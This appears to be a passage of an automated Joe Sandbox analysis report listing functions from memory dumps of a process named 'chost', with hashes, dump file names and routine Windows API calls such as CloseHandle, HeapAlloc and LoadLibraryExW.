                                                                                                                                                                                                                                        • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                        • Instruction ID: 288b2cef249928aea8583cc93b57c7aaf130ebc51f53ca54a9507e902d315e26
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2611B27161CA8181DA208B36A894169A361EB45BF4F548379EEBD8B7E9CE7CD051C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6943758A9), ref: 00007FF6943759C7
                                                                                                                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6943758A9), ref: 00007FF6943759DD
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1707611234-0
                                                                                                                                                                                                                                        • Opcode ID: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
                                                                                                                                                                                                                                        • Instruction ID: efd8dd3fddfb6255d0500bce521595e2629f620493ff0f0c38af7d35ee7ead1b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3eb82881f56b5e10c0b4ae1229c4961d4f4fc58e8f6ff53d00dfea58f30bf4d5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F711517261C652C2EAA88B26A49113EB760FB85771F50427AFADDC1ED8EF6CD054CF00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00007FF69437AA45,?,?,00000000,00007FF69437AAFA), ref: 00007FF69437AC36
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF69437AA45,?,?,00000000,00007FF69437AAFA), ref: 00007FF69437AC40
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                                                        • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction ID: 994d99068fe18482eb28fbef6b3132fdbb818ff5e869af92f1b4b1495ce75774
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D215031B2C68391EAB4677395D02791682DF847A0F0887BDDAAEC77D5CE6CA445D300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction ID: 9ab76d91146c12c683e9f8f48505d85182839996bd983f3890179b410bd51a70
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D641A432A1C201C7EA349B37A59127977A4EB56B94F108279DACEC77D1CF2DE402CB91
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                        • Opcode ID: e92a0dc91ef26cdd8f9e6f352d981f45ea0274e7df9581e9684e5913da368228
                                                                                                                                                                                                                                        • Instruction ID: 2fa1919d1eb75bb7de06042c7f166b5fec0f4c68b798813cb173d2aed1ecb6bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e92a0dc91ef26cdd8f9e6f352d981f45ea0274e7df9581e9684e5913da368228
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E421F621B0D652A5FE349B3365853BAA651FF49BC8F8C8878EE4C87786CE7DE041C610
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                        • Instruction ID: 4138969a18798ce02ba3a310b9bb7c338e5250efa121d14e20c41e60841d6992
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07313E31A1C642C5E7B16B76848167C3660EB50BA8F5181BDE9AD833D2DE7CB441C721
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction ID: 7846faf933c38a9319817f18cf0c2aeb26fee625e99eec61bc176603a3917ccd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88115432A1C642C1EA79AF62948027DA264EF95B80F94807DEBCCD7E96DF3DE440C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction ID: 18b7f6026fffbf18c35cf9c540faf7e0e14103eaa1544f07c85eaf2fddd62a22
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC21537261864186DB718F2AD48037DB6A1EB84B54F64C278E69DC77D5DF7CD401CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                        • Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                        • Instruction ID: b0116f10477641fc226d0b5064d4502c49cbb5685d918d8cfdf4d61ee8a5507f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7821A772B0878285EB649E35A861B7932E8EF41B4CF384435DA6D43ADDDE3CE841C751
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                        • Instruction ID: d06a6e3bc6d496ccfc456157caa01151f5c99b5d23cfc8bb8685d1509816ee5a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35018271A4C74180E924DF639981069A6A1EF85FE4B588679DE9C97BD6DE3CE101C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439
                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00007FF694366466,?,00007FF69436336E), ref: 00007FF694369092
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2592636585-0
                                                                                                                                                                                                                                        • Opcode ID: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                                        • Instruction ID: 8deddff62237b3e1978d76e2a4fc38dcb44b58846adfa2320906562140bbfa87
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73eda9eaecff5bf44f9f7388716af429d06d22f0ccc674e1ac4a626004a37bf7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72D08611B2414641EA64E777758652951519F89BC0E58C039EE4D43755DC3CD0418700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                        • Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                        • Instruction ID: 2a97268512bfaf2d059741164101f6cd58dcd7a04aec08e1a2b3060a249fb21d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9221A432B08B8086D3549B22A950B6AB2A9FB84B84F144035EB9D03FA9CF7CD551CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                        • Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                        • Instruction ID: 05ff750ffb15b08f955c4d251aef55e950e072ec10663f59e3933ef17774da3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02218132F0924285FB646A35A861A7932E8FF41B48F344531D92D47EDDCE3CE851C751
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                                                        • Opcode ID: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
                                                                                                                                                                                                                                        • Instruction ID: ad3b97ef0ffcf3f427cc4f84646c10cf90d13f87f88beb95b8ec187ae0eb7c58
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFF0EC22B08B8185E7059B26F8106AAB668FB85FC4F584035EE9D47FA9CE7CDA518604
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF694370D00,?,?,?,00007FF69437236A,?,?,?,?,?,00007FF694373B59), ref: 00007FF69437D6AA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                        • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                        • Instruction ID: c4e8d760e671bee1265a566b8a3fe97f7fe7e1bef0c549d29f9bc483c7ea1201
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28F03420A2D30284FE74667358D12B95290CF94BA0F8882B8D8AEC53C2EE2CB480C620
